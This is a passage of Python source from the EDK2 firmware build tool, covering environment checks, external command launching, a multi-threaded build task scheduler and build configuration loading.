EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
ExtraData=EcpSourceDir)
if not os.path.exists(EdkSourceDir):
if EdkSourceDir == EcpSourceDir:
EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
ExtraData=EdkSourceDir)
elif ' ' in EdkSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
ExtraData=EdkSourceDir)
if not os.path.exists(EfiSourceDir):
if EfiSourceDir == EcpSourceDir:
EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
ExtraData=EfiSourceDir)
elif ' ' in EfiSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
ExtraData=EfiSourceDir)
# check those variables on single workspace case
if not PackagesPath:
# change absolute path to relative path to WORKSPACE
if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gEfiSource = EfiSourceDir
GlobalData.gEdkSource = EdkSourceDir
GlobalData.gEcpSource = EcpSourceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if not isinstance(Command, type("")):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if not isinstance(Command, type("")):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = BuildTask._PendingQueue.keys()
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo, Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
# avoid tense loop
time.sleep(0.1)
except BaseException as X:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
if BuildOptions.DisableCache:
self.Db = WorkspaceDatabase(":memory:")
else:
self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append("MSFT")
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
if self.ThreadNumber is None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
try:
self.ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
# create metafile database
if not self.Db_Flag:
self.Db.InitDatabase()
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db.InitDatabase()
self.Db_Flag = True
Platform = self.Db._MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
